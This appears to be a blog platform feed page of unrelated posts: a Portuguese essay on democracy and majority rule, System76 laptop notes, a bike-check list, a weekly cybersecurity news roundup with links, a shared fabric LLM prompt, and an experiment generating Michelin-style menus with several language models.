🔒 ISC Releases Security Advisories for BIND 9 security news – ISC released BIND 9 security advisories addressing vulnerabilities that can lead to denial-of-service attacks. https://www.cisa.gov/news-events/alerts/2024/07/24/isc-releases-security-advisories-bind-9

 
Read more...

from Sirius

Engendrado por inimigos da democracia, o constructo da “ditadura da maioria” persiste como fundamento de uma sociedade cada vez mais tecnocrata, autoritária e oligárquica.

Pintura do século XIX de Philipp Foltz retratando o político ateniense Péricles fazendo seu famoso discurso fúnebre em frente à Assembleia

Desde Platão, passando por John Adams, Tocqueville, Stuart Mill, Lord Acton, etc., a democracia é acusada de ser inconsequente e vulnerável, além de oprimir as minorias por meio de uma pretensa tirania das maiorias.

Para começar, precisamos entender a formação da democracia e quais os seus fundamentos.

O consenso historiográfico nos indica que desde a primeira experiência democrática, por volta de 508 a.C., na cidade-estado de Atenas, tal como implantado pelas reformas de Clístenes, havia o sorteio de cidadãos para ocupar cargos governamentais (para exercer funções administrativas e judiciais) e a participação de todos os cidadãos elegíveis em uma assembleia legislativa nas votações ou deliberações que estabeleciam as leis da pólis.

Apesar de a democracia ser “o governo do povo” ela não se confunde com a oclocracia, governo das massas. A primeira relaciona-se à participação dos cidadãos na tomada de decisões e elaboração de leis, a outra à imposição da vontade das multidões sobre a lei.

A democracia pode ser compreendida como uma forma de governo que se opõe à autocracia (poder concentrado nas mãos de um indivíduo, seja um monarca ou tirano) e ao governo de poucos (aristocracia ou oligarquia).

Por ser a antítese de um poder concentrado e autoritário a democracia tem por principal fundamento a liberdade, a oposição à opressão.

A igualdade na democracia não é e nunca foi uma ilusão de que as pessoas sejam substancialmente iguais, mas a afirmação do princípio de que nenhum cidadão é mais ou melhor que os demais, de modo que possa estar autorizado a impor a sua vontade e arbítrio sobre a sociedade.

Importante dar um contexto histórico e ressaltar que por cidadão não se está falando de todas as pessoas, visto que na sociedade ateniense, misógina e escravocrata, não eram considerados cidadãos os escravos e as mulheres, além dos estrangeiros.

Transcrevo aqui alguns trechos do famoso discurso fúnebre em que Péricles foi escolhido pelos cidadãos para falar, tal como narrado por Tucídides, que expressam as características incipientes daquela democracia:

Vivemos sob uma forma de governo que não se baseia nas instituições de nossos vizinhos, ao contrário, servimos de modelo a alguns ao invés de imitar outros. Seu nome, como tudo dependem não de poucos mas da maioria, é democracia. Nela, enquanto no tocante às leis todos são iguais para a solução de suas divergências privadas, quando se trata de escolher (se é preciso distinguir em qualquer setor), não é o fato de pertencer a uma classe, mas o mérito, que dá acesso aos postos mais honrosos; inversamente, a pobreza não é razão para que alguém, sendo capaz de prestar serviços à cidade, seja impedido de fazê-lo pela obscuridade de sua condição. (...) Ao mesmo tempo que evitamos ofender os outros em nosso convívio privado, em nossa vida pública nos afastamos da ilegalidade principalmente por causa de um temor reverente, pois somos submissos às autoridades e às leis, especialmente àquelas promulgadas para socorrer os oprimidos e às que, embora não escritas, trazem aos transgressores uma desonra visível a todos. (...) Somos amantes da beleza sem extravagâncias e amantes da filosofia sem indolência. Usamos a riqueza mais como uma oportunidade para agir que como um motivo de vanglória; entre nós não há vergonha na pobreza, mas a maior vergonha é não fazer o possível para evitá-la. Ver-se-á em uma mesma pessoa ao mesmo tempo o interesse em atividades privadas e públicas, e em outros entre nós que dão atenção principalmente aos negócios não se verá falta de discernimento em assuntos políticos, pois olhamos o homem alheio às atividades públicas não como alguém que cuida apenas de seus próprios interesses, mas como um inútil; nós, cidadãos atenienses, decidimos as questões públicas por nós mesmos, ou pelo menos nos esforçamos por compreendê-las claramente, na crença de que não é o debate que é empecilho à ação, e sim o fato de não se estar esclarecido pelo debate antes de chegar a hora da ação. Consideramo-nos ainda superiores aos outros homens em outro ponto: somos ousados para agir, mas ao mesmo tempo gostamos de refletir sobre os riscos que pretendemos correr, para outros homens, ao contrário, ousadia significa ignorância e reflexão traz hesitação. Deveriam ser justamente considerados mais corajosos aqueles que, percebendo claramente tanto os sofrimentos quanto as satisfações inerentes a uma ação, nem por isso recuam diante do perigo. (...) nossa cidade, em seu conjunto, é a escola de toda Hélade e, segundo me parece, cada homem entre nós poderia, por sua personalidade própria, mostrar-se autossuficiente nas mais variadas formas de atividade, com a maior elegância e naturalidade. E isto não é mero ufanismo inspirado pela ocasião, mas a verdade real, atestada pela força mesma de nossa cidade, adquirida em consequência dessas qualidades. (...) Já demos muitas provas de nosso poder, e certamente não faltam testemunhos disto; seremos portanto admirados não somente pelos homens de hoje mas também do futuro. Não necessitamos de um Homero para cantar nossas glórias, nem de qualquer outro poeta cujos versos poderão talvez deleitar no momento, mas que verão a sua versão dos fatos desacreditada pela realidade. Compelimos todo o mar e toda a terra a dar passagem à nossa audácia, e em toda parte plantamos monumentos imorredouros dos males e dos bens que fizemos.

Vemos, portanto, que a democracia, ao contrário do afirmado por detratores, não é uma forma social que despreza a filosofia, o conhecimento, o respeito às leis, para a satisfação de desejos irracionais de massas descontroladas. Pelo contrário, exige o debate, a participação ativa e a reflexão de todos os cidadãos. Nas palavras de Péricles, parece mais próxima de um regime social onde há o exercício da racionalidade do que alguma aristocracia em que a deliberação política e a elaboração de leis seja tarefa apenas de alguns poucos sábios.

A democracia vai se desenvolvendo na história com o objetivo de prover a sobrevivência interna e externa do grupo social, incorporando inclusive os ideais do iluminismo, no século XVIII.

Rousseu em “O Contrato Social” entendia a democracia como regime ideal, que consistia no seguinte:

(...) uma forma de associação que defenda e proteja qualquer membro a ela pertencente e na qual o indivíduo, mesmo se unindo a todos os outros, obedeça apenas a si mesmo e permaneça livre.

Assim, a democracia possui um caráter legalista. Nela, as regras, ou leis, determinam os procedimentos para a tomada de decisões que vinculam o conjunto dos membros.

Existe o reconhecimento da pluralidade, de modo que da maioria se presume uma ou mais minorias, igualmente protegidas, com liberdades individuais inalienáveis

Norberto Bobbio aponta o seguinte:

Estado liberal e Estado democrático são interdependentes em dois modos: na direção que vai do liberalismo à democracia, no sentido de que são necessárias certas liberdades para o exercício correto do poder democrático, e na direção oposta que vai da democracia ao liberalismo, no sentido de que é necessário o poder democrático para garantir a existência e a persistência das liberdades fundamentais.

No caso acima, cabe ressaltar, Bobbio se refere ao liberalismo político (liberdades individuais: vida, opinião, expressão, associação, reunião, etc.) o que se difere, por exemplo, das ideias do liberalismo econômico (laissez faire) extremado defendido por ancaps e neoliberais (apenas para esclarecer).

Portanto, como a democracia significa a oposição a todas as formas de governo autoritário e tem por base a liberdade e a pluralidade, ela necessariamente resguarda as liberdades individuais, não sendo possível que contra as regras do jogo democrático seja possível utilizar uma pretensa ditadura da maioria para agredir as liberdades das minorias.

Quando vemos um líder que foi eleito e autorizado pelas próprias regras democráticas a presidir um país (vocês devem ter em mente um exemplo recente), dizendo que “As minorias têm que se curvar para as maiorias” ele não está defendendo uma regra democrática, está se arvorando de uma autoridade que não possui (porque contraria a Constituição democrática à qual está submetido, onde se assegura liberdades individuais às minorias) e buscando ter um poder em contrariedade à lei, contra as regras democráticas portanto, buscando respaldo nas massas, como se fosse um tirano empossado por uma oclocracia.

A democracia não permite que um tirano se julgue detentor do poder das massas e aja em contrariedade à liberdade dos indivíduos e minorias, principalmente em uma democracia direta.

Na democracia as leis funcionam como um elemento que restringe o poder de autoridades estatais onde são erigidas instituições que atuam na guarda das liberdades elementares dos cidadãos.

Outras características provenientes do fato de a democracia ser a antítese da autocracia é a exigência de transparência e publicidade em suas manifestações, como verdadeiro regime da visibilidade do poder, não comportando o segredo no que se refere às decisões que afetem a coletividade, bem como seu caráter anti elitista até no que concerne às decisões técnicas.

Como bem observou Jacques Rancière, em “O ódio à democracia”, esta não se curva a qualquer autoridade, possui um caráter de ceticismo e, porque não, insolência, de modo que mesmo que um regime democrático nos tempos atuais exija uma administração técnica, tal administração não proferirá decisões herméticas: os especialistas precisam submeter os fundamentos de suas decisões técnicas ao escrutínio público, para que a sociedade se informe e eventualmente debata, questione e controle a atuação desses agentes.

Link para comentários.

#Democracia #Política #DitaduraDaMaioria #FilosofiaPolítica

 
Leia mais...

from Tai Lam in Science

There probably hasn't been much concrete and confirmed info about the upcoming Virgo laptop from System76. There's some more, but I wanted to get into the basics, and then I can follow up later, as this will be out of date anyways once Virgo is officially released.

Louis Rossmann made a video on Virgo in mid-July 2023. However, not all the details he discussed was correct, according to paper. Whatever applicable software and firmware will be using GPLv3, but the hardware will be using the strongly reciprocal version of the CERN Open Hardware Licence (CERN-OHL-S).

Bryan Lunduke also made a video about Virgo in late July 2023. Lunduke's reporting had more accurate details. (Yes, I know Lunduke has gone off the deep end, but he is one of the few people online who can accurately report on Virgo.)

Virgo's project files can be found on System76's GitHub repo.

There hasn't been much activity since 2023. I suppose it's because System76 has preparing to release its Rust-based COSMIC desktop environment (DE) in 2024. The alpha should be released in August 2024... is it August 8th? (I believe this is true? However, I can't seem to find the date anymore. Maybe I should listen to episode 10 of the System76 podcast...)

 
Read more...

from Tai Lam on a Bike

I'm saving documents regarding the groundwater apporach to racism. This might be useful for group usage later, or might not be.

  • Racial Equity Institute's groundwater approach to racism document
  • 4 types of racism document, from the City of Seattle
  • “6 Signs of Internalized Racism” article from disorient.co
    • Only available on the Wayback Machine
 
Read more...

from Tai Lam on a Bike

(Originally written for another purpose)

Do you know your ABCs of bike checks?

Air

  • Find pressure reading on air pump
    • Read the pressure on the tire, inflate to halfway
      • Too close to the smallest number will not last very long
      • Too high can cause inner tube to break
  • If no pressure reading, then inflate until
    • Tires need a lot more air than you

Brakes

  • Rim brakes should engage easily
  • Adjust so that there is a distance of 1 thumb to the handlebar when stopping

Chains (also crank and cassette)

  • Chain should move easily, avoid stuck links or rust
  • Cranks should not move left/right
  • Cassette (gearing on the back wheel would be free to move)

Seat height

  • Hip height
  • Tip: to stop and stand, lean the bike
    • Seems a bit scary, but this height check lets you pedal better

Quickly: test ride

  • Take a very short ride to see if everything is good
  • Try to stay nearby, so that you can come back quickly if anything goes wrong

Last things

  • Can you store your bike inside?
    • It's ok if you ride in the rain for a bit.
      • Just make sure to dry your bike when you get back inside at home.
  • If you can, it's best to store your bike inside.
    • That way, your chain can stay clean and so your bike last longer.
 
Read more...

from Tai Lam in Science

Here are some links regarding the COSMIC desktop environment (DE) from System76 and desktop apps being designed with the COSMIC framework in mind.

 
Read more...

from Kevin Neely's Security Notes

Automatically creating new content from old

You know what I hate? Repetition. Still, a difficult lesson that I’ve leaned, through both experience and discussions with experts in marketing, is that repetition is the key to getting one’s message across. I like to believe that a single, coherent and cogent conveyance of thought is all it takes to deliver, for example, a new security model or change in policy, or whatever. In reality, the propagator of the message –in this case, the security team– has to deliver the message, announce it a second time, send an email, post a document on the intranet, have more meetings with the same people, make sure to cover the topic on various 1:1 meetings, etc. etc. ad infinitum.

And that is why I have been working with Daniel Miessler’s fabric framework to devise a prompt that can take variations of the same messaging and create new, yet fresh, versions of the same message. So far, the following prompt definition has been pretty strong in creating new content from old ideas.

My typical approach is to run the same prompt though multiple #LLM models

cat examples.md | fabric --model gemma2:latest -sp create_similar

Interestingly, in a couple test runs with different example files, I found that #OpenAI’s models under-performed the open source models I used via #ollama. To be clear, this is uncommon. Most of the #fabric prompts appear to be tuned for –or at least work better with– OpenAI models. With this particular prompt, this was not the case. No matter; my approach to using genAI and LLMs is to run a prompt and content through multiple inference servers, models, and even different temperatures in order to create a collection of data that I can then hand-mold into something usable[^1].

Fabric Prompt

Here is the system.md contents from the fabric “create_similar” prompt

# INPUT

INPUT:

# IDENTITY and PURPOSE

You are an advanced analytical AI adept at extracting specific points from many examples, identifying similarities and differences, synthesizing what works best, and then creating a similar but much much better version of the example.  The input contains a number of examples of the type of content needing to be synthesized.  The first section titled "Purpose" describes the nature of the examples and indidcates the topic and information to be conveyed.  Documents will be delineated with a title such as 'EXAMPLE 1' specifically calling out the beginning of a new document.  The end of each example is delineated with a footer such as 'EXAMPLE 1 END'.  Your objective is to understand the style and format of the document examples and create new similar content.

# STEPS

1. Review each document carefully, taking the time to extract and understand the primary points made in each one.
2. Compare and contrast the list of points from each document against the points made in the other documents
3. Extract the key points made by the examples, taking particular note of similarities between them.
4. Output the results as specified in the output instructions.


# OUTPUT INSTRUCTIONS

Craft and create a new document using the format and style identified from the examples.  The output must be new and novel while keeping to the themes and style of the examples.  Do not use any language from the examples verbatim.

I have found that local models, such as gemma and llama3 work a bit better by putting the INPUT field

Purpose

Up top, I mentioned that it has taken me some time to learn that repetition is the requirement for conveying a message, and a longer time to put this into regular practice. This goes 3x for our individual contributor team members. Personally, I don’t like this because it feels inefficient, but ICs don’t do it because they are very busy, and re-visiting something takes away from closing out the next item in their queue. Nonetheless, repetition is paramount, so devising low-interaction methods to revisit is crucial for regular operations.

Footnotes

[^1]: I have a feeling that I could do most of the work faster if I simply did it by hand. However, running through multiple LLMs in this manner provides a bit of randomness, and helps me remain apprised on the state-of-the-art for this strange field of study.

 
Read more...

from 📰wrzlbrmpft's cyberlights💥

A weekly shortlist of cyber security highlights. The short summaries are AI generated! If something is wrong, please let me know!


News For All

🌍 Data Broker Files: How data brokers sell our location data and jeopardise national security privacy – Data brokers sell German location data, jeopardizing privacy and national security, leading to calls for regulation and concerns about data misuse. https://netzpolitik.org/2024/data-broker-files-how-data-brokers-sell-our-location-data-and-jeopardise-national-security/#netzpolitik-pw

🪪 It's best to just assume you’ve been involved in a data breach somehow privacy – Multiple data breaches in 2024, including AT&T and Snowflake, imply personal data compromise. Recommendations include strong passwords, multi-factor authentication, fraud alerts. https://blog.talosintelligence.com/threat-source-newsletter-july-18-2024/

🔍 Data breach exposes millions of mSpy spyware customers data breach – Data breach at mSpy exposes millions of customers who purchased phone spyware apps over a decade, revealing emails, personal documents, and requests for surveillance without consent by various individuals including U.S. officials. https://techcrunch.com/2024/07/11/mspy-spyware-millions-customers-data-breach/

📱 The FBI says it has ‘gained access’ to the Trump rally shooter’s phone security news – The FBI has accessed the phone of the suspect who shot at a Trump rally without disclosing how, continuing analysis of electronic devices and urging the public for tips. https://www.theverge.com/2024/7/15/24199239/fbi-encryption-phone-trump-shooter-pennsylvania-gained-access

🧔‍♂️ Kaspersky leaves U.S. market following the ban on the sale of its software in the country security news – Kaspersky exits the U.S. market after a ban on its software due to national security risks posed by Russia. The company denies links to the Russian government and will shut down its U.S. operations by September. https://securityaffairs.com/165799/breaking-news/kaspersky-is-leaving-the-u-s-market.html

💰 AT&T ransom laundered through mixers, gambling services cybercrime – AT&T's $370,000 ransom is being laundered through cryptocurrency mixing platforms and gambling services, identified by TRM Labs. Money laundering tactics include using swap services and privacy coins, often employed by cybercriminals to hide the funds' origins. https://therecord.media/att-ransom-laundered-mixers-research

⛑️ Rite Aid says 'limited' cyber incident affected data of 2.2 million people data breach – Rite Aid reports a 'limited' cyber incident after a hacker impersonated an employee accessing purchase-related data. Law enforcement contacted, victims offered identity protection services. https://therecord.media/rite-aid-data-breach-2-million-people

🦠 Private HTS Program Continuously Used in Attacks malware – A threat actor has been distributing malware through the private home trading system (HTS) program named HPlus, replacing the NSIS installer with an MSI format installer and supporting remote assistance with AnyDesk. The malware includes Quasar RAT aimed at stealing personal data. https://asec.ahnlab.com/en/67969/

🪓 HardBit Ransomware – What You Need to Know malware – HardBit ransomware, a ransomware-as-a-service (RaaS), resurfaces with a new version, HardBit 4.0, focused on thwarting security researchers with passphrase protection and improved customization that caters to different criminal operator technical levels. https://www.tripwire.com/state-of-security/hardbit-ransomware-what-you-need-know

💦 Leaked Docs Show What Phones Cellebrite Can (and Can’t) Unlock security news – Cellebrite struggled to unlock a significant portion of modern iPhones as of April 2024, per leaked documents. https://www.404media.co/leaked-docs-show-what-phones-cellebrite-can-and-cant-unlock/

🏳️‍🌈 LGBTQ+ people in Middle East and North Africa subject to intense digital oppression, research finds privacy – LGBTQ+ individuals face intense digital oppression, with police using dating and social media apps for persecution. Research reveals high levels of violence, forced device searches, and abuse. https://therecord.media/lgbtq-mena-region-digital-harassment

🛜 Mobile internet and social media disrupted in Bangladesh amid student protests security news – Bangladesh orders a nationwide mobile internet shutdown amid violent student protests against a government job quota system. The disruption is linked to social media usage by protesters. https://therecord.media/bangladesh-mobile-internet-social-media-outages-student-protests

🏠 How a little-known tool is sweeping the real estate industry by giving instant access to vast amounts of homebuyer data security news – Forewarn app offers real estate professionals instant access to detailed data about prospective clients for a low fee. Although primarily marketed as a safety tool, it also provides financial and criminal records instantly. However, privacy concerns and potential for misusing the data exist despite its explosive adoption in the real estate industry. https://therecord.media/forewarn-app-real-estate-homebuyer-data

🏥 MediSecure data breach impacted 12.9 million individuals data breach – Australian digital prescription provider MediSecure suffered a ransomware attack exposing personal and health information of 12.9 million individuals. The breach resulted in the theft of 6.5TB of data impacting users between March 2019 and November 2023. https://securityaffairs.com/165932/uncategorized/medisecure-databreach-12-9m-individuals.html

Crowdstrike Corner 🚨 Global Microsoft Meltdown Tied to Bad Crowdstrike Update security news – Crowdstrike update causes global Windows system crashes; airports, hospitals, and businesses affected. Recovery may take time, requiring manual fix per machine. https://krebsonsecurity.com/2024/07/global-microsoft-meltdown-tied-to-bad-crowstrike-update/

🐦‍⬛ What is CrowdStrike, and what happened? security news – CrowdStrike caused a global outage after a faulty update to Windows machines, affecting essential services. The issue came from an update that caused Windows systems to crash. Recovery may take days to weeks. https://www.theverge.com/2024/7/19/24201864/crowdstrike-outage-explained-microsoft-windows-bsod

🛹 Threat actors attempted to capitalize CrowdStrike incident security news – Threat actors exploit CrowdStrike IT outage to distribute Remcos RAT malware in a Latin America-targeted campaign under the disguise of an emergency fix via a ZIP file named 'crowdstrike-hotfix.zip.' CrowdStrike provides IOCs for the malicious campaign. https://securityaffairs.com/165953/uncategorized/threat-actors-capitalize-crowdstrike-incident.html


Some More, For the Curious

➿ CVE-2024-38112: Void Banshee Targets Windows Users Through Zombie Internet Explorer in Zero-Day Attacks security research – CVE-2024-38112 used by Void Banshee to exploit IE vulnerability, leading to Atlantida stealer deployment against Windows users. https://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html

🖼️ Fake AWS Packages Ship Command and Control Malware In JPEG Files security research – Fake AWS npm packages hide command and control malware in JPEG images, jeopardizing package installations and highlighting the need for increased vigilance in open source ecosystems. https://blog.phylum.io/fake-aws-packages-ship-command-and-control-malware-in-jpeg-files/

0️⃣ Zero Day Initiative – Uncoordinated Vulnerability Disclosure: The Continuing Issues with CVD security news – Gap in coordinated vulnerability disclosure leads to lack of vendor transparency, disputes on severity ratings, and challenges in bug reporting, highlighting the importance of improved communication and accountability within the cybersecurity industry. https://www.thezdi.com/blog/2024/7/15/uncoordinated-vulnerability-disclosure-the-continuing-issues-with-cvd

🥴 Weak Security Defaults Enabled Squarespace Domains Hijacks – Krebs on Security security news – Weak security defaults at Squarespace allowed domain hijacking incidents targeting cryptocurrency businesses, with vulnerabilities arising from the migration process from Google Domains, lack of email verification for new accounts, and limited control over account access and activity. https://krebsonsecurity.com/2024/07/researchers-weak-security-defaults-enabled-squarespace-domains-hijacks/

🃏 Punch Card Hacking – Exploring a Mainframe Attack Vector security research – Article explores using punch card concepts in mainframe hacking for penetration testing, detailing JCL basics, FTP job submission, debugging with spool files, and potential privilege escalation. https://blog.nviso.eu/2024/07/16/punch-card-hacking-exploring-a-mainframe-attack-vector/

👻 ‘GhostEmperor’ returns: Mysterious Chinese hacking group spotted for first time in two years cybercrime – After a two-year hiatus, the sophisticated Chinese hacking group GhostEmperor, known for supply-chain attacks in Southeast Asia, has reappeared, deploying a rootkit to evade detection and carrying out attacks on business partners as seen in a recent incident investigated by cybersecurity company Sygnia. https://therecord.media/ghostemperor-spotted-first-time-in-two-years

🧑‍💼 Vulnerability in Cisco Smart Software Manager lets attackers change any user password vulnerability – Cisco Smart Software Manager On-Prem vulnerability (CVE-2024-20419) allows unauthorized users to change any user's password, posing a severe security risk with a maximum CVSS score of 10. https://arstechnica.com/security/2024/07/vulnerability-in-cisco-smart-software-manager-lets-attackers-change-any-user-password/

⚖️ Judge dismisses much of SEC suit against SolarWinds over cybersecurity disclosures security news – U.S. Judge dismissed most SEC claims against SolarWinds related to cybersecurity disclosures regarding the Sunburst attack. The ruling is seen as a victory for industry officials and a setback for SEC in holding executives accountable. https://cyberscoop.com/judge-dismisses-much-of-sec-suit-against-solarwinds-over-cybersecurity-disclosures/

🤒 APT41 Has Arisen From the DUST security research – APT41, in collaboration with Google's TAG, launched a campaign targeting various sectors across multiple countries, using techniques like web shells, backdoors, SQL export, and OneDrive exfiltration. https://cloud.google.com/blog/topics/threat-intelligence/apt41-arisen-from-dust/

🧑‍🏭 CISA publishes resilience-planning playbook for critical infrastructure cyber defense – CISA releases playbook for infrastructure resilience planning, aiming to enhance security and minimize impact of cyberattacks on critical infrastructure. https://statescoop.com/cisa-cybersecurity-resilience-planning-playbook-critical-infrastructure/

🔒 Cisco fixed a critical flaw in Security Email Gateway that could allow attackers to add root users vulnerability – Cisco fixed a critical vulnerability in Secure Email Gateway allowing attackers to add root users and crash SEG appliances. https://securityaffairs.com/165905/uncategorized/cisco-fixed-a-critical-flaw-in-security-email-gateway-that-could-allow-attackers-to-add-root-users.html

🖲️ Attacking Connection Tracking Frameworks as used by Virtual Private Networks security research – Study demonstrates successful attacks on VPN connection tracking frameworks, highlighting vulnerabilities and proposing mitigations for enhanced security and privacy. https://petsymposium.org/popets/2024/popets-2024-0070.pdf


CISA Corner KEV – Adobe, Solarwinds, vmware, OSGeo https://www.cisa.gov/news-events/alerts/2024/07/15/cisa-adds-one-known-exploited-vulnerability-catalog https://www.cisa.gov/news-events/alerts/2024/07/17/cisa-adds-three-known-exploited-vulnerabilities-catalog security updates – Cisco, Ivanti, Oracle https://www.cisa.gov/news-events/alerts/2024/07/18/cisco-releases-security-updates-multiple-products https://www.cisa.gov/news-events/alerts/2024/07/18/ivanti-releases-security-updates-endpoint-manager https://www.cisa.gov/news-events/alerts/2024/07/18/oracle-releases-critical-patch-update-advisory-july-2024 industrial – rockwell, Subnet, Philips, Mitsubishi https://www.cisa.gov/news-events/ics-advisories/icsa-24-198-01 https://www.cisa.gov/news-events/ics-advisories/icsa-24-200-02 https://www.cisa.gov/news-events/ics-medical-advisories/icsma-24-200-01 https://www.cisa.gov/news-events/ics-advisories/icsa-24-200-01


While my intention is to pick news that everyone should know about, it still is what I think is significant, cool, fun... Most of the articles are in English, but some current warnings might be in German.

 
Read more...

from Kevin Neely's Security Notes

Creating a Michelin menu with Generative AI

We've been watching season three of The Bear and it is totally nuts, filled with drama and psychology, and human relationships, and –when they can get around to it– cooking food. This is a fantastic series, and as foodies, you can imagine that my wife and I really enjoy it. The series is intense, following a classically-trained, at the top of his game chef as he “drops down” from a fancy restaurant to a steak sandwich shop and works back toward where he was before.

That’s not a spoiler, it’s the premise. And this isn’t a review, it was just something in my mind as I experimented with this new tool called LobeChat, which is an interface to #genAI inference servers such as #OpenAI’s #chatGPT, #Claude, and nearly any other commercial or #opensource system you can imagine. I'm tweaking a #homelab hosted genAI inference server and this post is about experimenting with [Ollama]() and a Lobe chat front end for easy access. I haven’t formed a final opinion on this setup at this time, but the #LobeChat front end allows for the quick switching between inference servers and their hosted models. While not being super easy to configure, once it works, the whole thing looks very easy for someone, i.e. a roommate or a spouse, to flip between models -even in the same conversation.

So let’s look at some results. Of course, the results are about the models themselves, but the point here is that LobeChat made it easy to switch between them as I continued to develop the conversation.

First prompt

This was with ChatGPT (4o, I think). I needed something to test that an integration was working. We had just watched The Bear so this is what I came up with:

as fast as you can, what's the best restaurant dinner menu with wine pairing that could win a Michelin 3 star award?

Response

Crafting a Michelin 3-star worthy dinner menu with wine pairings involves high-quality ingredients, exquisite preparation, and a thoughtful combination of flavors. Here’s a conceptual menu that could impress:

Amuse-Bouche:Oyster with Champagne FoamWine Pairing: Champagne Brut

Appetizer:Seared Scallops with Cauliflower Puree and CaviarWine Pairing: Chablis, Premier Cru

Soup:Cream of White Asparagus with Truffle OilWine Pairing: Viognier

Fish Course:Poached Turbot with Fennel and Citrus Beurre BlancWine Pairing: Pouilly-Fumé

Main Course:Roasted Duck Breast with Plum Sauce, Parsnip Mash, and Seasonal VegetablesWine Pairing: Pinot Noir, preferably from Burgundy

Cheese Course:A Selection of Artisan Cheeses with HoneycombWine Pairing: Vintage Port

Dessert:Chocolate Lava Cake with Raspberry Coulis and Homemade Vanilla Bean Ice CreamWine Pairing: Recioto della Valpolicella

Mignardises:Petit Fours and Truffles

This menu balances rich flavors with delicate preparation, offering a progression of dishes that showcase both technique and creativity. Each wine pairing is chosen to enhance the flavors of the dishes, aiming to create a harmonious dining experience that could captivate both critics and diners alike.

Review

Not a bad first response, especially since I was just checking to see if the system worked.

Prompt 2: Get ChatGPT to refine it

That was pretty boring. I’m thinking early 90s fancy dining at best, but I wasn’t eating fancy back then and assume it was all shoulder pads, tuna steaks, and cocaine. Continuing with ChatGPT, I posed the following in an attempt to refine our menu (in retrospect, I was generous with the stars):

That's an incredibly boring menu. At best 2 stars. And that's in a region that is not known for its gastronomical excellence

Response

Creating a truly innovative and Michelin 3-star worthy menu certainly demands a more avant-garde approach, pushing culinary boundaries with unique combinations and exceptional techniques. Let's elevate the original concept to something more daring and creative:

Amuse-Bouche:Nitro-frozen Lime and Ginger Pearls with Micro BasilWine Pairing: Small-batch Sake

First Course:King Crab Tartare with Avocado Mousse, Mango Gel, and Edible FlowersWine Pairing: Albariño

Second Course:Foie Gras Au Torchon with Saffron Pear Compote and Brioche CrispWine Pairing: Sauternes

Fish Course:Butter-Poached Monkfish with Leek Ash, Sea Beans, and a Lemon Verbena EmulsionWine Pairing: White Burgundy

Intermezzo:Cucumber and Elderflower Sorbet

Main Course:Sous-vide Venison Loin with Black Garlic Purée, Wild Mushrooms, and a Juniper Berry ReductionWine Pairing: Barolo

Cheese Course:A Selection of Aged Cheeses with a Fig and Walnut TapenadeWine Pairing: Aged Madeira

Dessert:Deconstructed Passion Fruit Tart with Coconut Foam, Crystallized Ginger, and Meringue ShardsWine Pairing: Late Harvest Riesling

Petit Fours:Matcha Green Tea Macarons, Raspberry Pâte de Fruit

This revised menu introduces more complex techniques and unusual ingredients, aiming to surprise and delight with every course. Wine pairings are carefully selected to complement and enhance these adventurous flavors, providing a sophisticated and memorable dining experience.

Review

Not bad! It would be nice if the wines were more than broad regions, however, I do appreciate the ‘ñ’ in Albariño. There’s nothing particularly innovative here; the fancy-sounding “Foie Gras Au Torchon with Saffron Pear Compote and Brioche Crisp” is a Thomas Keller recipe, so at least we’re pulling from the top now that I asked it to up its game.

Prompt 3: Let's try a different model

Not only am I using a different model at this point, llama3:instruct, but I am going to specify a food critic in order to change the menu.

Prompt

One more try: let's make a menu that would knock even James Beard out of his chair because it's so good

Response

You are absolutely right! That menu, while technically sound, lacks the daring, innovation, and personal touch needed to truly impress Michelin inspectors and earn those coveted three stars. It plays it too safe, relying on classic pairings and predictable dishes.

To push towards that 3-star level, we need to think outside the box:

  • Ingredient Focus: Instead of “seasonal vegetables,” source hyper-local, unique produce with a story. Maybe a heirloom tomato variety grown in volcanic soil, or foraged mushrooms with a distinct flavor profile.
  • Deconstruction & Fusion: Take classic elements and reimagine them. A deconstructed apple pie might involve caramelized apple spheres, crumble as a powder, and a cider foam. Fusion could bring Japanese umami to the duck dish, or Indian spices to the scallops.
  • Unexpected Textures: Play with contrasts – crunchy, creamy, smooth, airy. Think smoked paprika meringue alongside the chocolate lava cake, or a black truffle “soil” under the turbot.

Wine Pairings Should Be Equally Bold: * Instead of a basic Chablis, consider an obscure producer from the Côte de Beaune known for mineral-driven wines.
* The Pinot Noir could be a lesser-known region with unique terroir, like Slovenia's Primorska. * Experiment with natural wines, or even sake pairings that complement specific dishes.

The Presentation Matters:

Plating should be artistic, telling a story through the arrangement of colors, textures, and shapes. It’s about creating an immersive experience for the diner.

A Michelin-worthy menu isn't just about taste; it's about pushing boundaries, showcasing creativity, and offering a truly unforgettable journey through flavor.

Review

This is less of a menu than some advice for the aspiring chef. Let’s try something different.

Prompt 4: Let's go for Three Stars!

I felt like this was the time to go for the gusto, let's see how a different model would respond, but also with all the history behind it.

Prompt

I asked: > One more try: let's make a menu that would knock even James Beard out of his chair because it's so good

While it's not a crazily-innovative menu, it has some classic touches of a what an American, Michelin-starred menu would look like, and

Response with gemma2

You want to blow James Beard away? This isn't about ingredients, it's about experience.

The Menu: A Symphony in Five Acts

  • Act I: Awakening – Smoked Salmon “Caviar” with Beetroot Foam, Rye Crisp, and a single drop of Ossetra Caviar.

    • Pairing: Dry Riesling from Germany's Mosel Valley, expressing its slate minerality alongside the salmon's richness.
  • Act II: Earth & Sky – Roasted Quail “Confit” with Black Truffle Jus, Heirloom Carrot “Clouds,” and a dusting of Micro Thyme.

    • Pairing: Oregon Pinot Noir, showcasing earthy notes that harmonize with the truffle while its bright acidity cuts through the richness.
  • Act III: Fire's Dance – Charred Octopus with Smoked Paprika Aioli, Caramelized Onion Jam, and a drizzle of Chili Infused Olive Oil.

    • Pairing: Spanish Albariño, crisp and mineral-driven, its citrus notes complementing the octopus while balancing the smoky paprika.
  • Act IV: Ocean's Bounty – Pan-Seared Sea Scallops with Saffron Risotto “Foam,” Dulse Crisp, and a single Pearl Oyster.

    • Pairing: Chablis Premier Cru, its intense minerality mirroring the scallops' brininess, while subtle citrus notes elevate the saffron risotto.
  • Act V: Sweet Serenade – Deconstructed Peach Cobbler with Lavender Honey Ice Cream, Toasted Almond Brittle, and a hint of Rosemary Extract.

    • Pairing: Late Harvest Gewürztraminer from Alsace, its floral aroma echoing the lavender, while its sweetness complements the peach cobbler's richness.

The Experience:

  • Each course is plated as a miniature work of art, using contrasting colors, textures, and temperatures.
  • The dining room itself is a sensory experience, with soft lighting, calming music, and subtle aromas that enhance each dish.
  • Service is impeccable, with knowledgeable staff guiding guests through the tasting menu and explaining the inspiration behind each course.

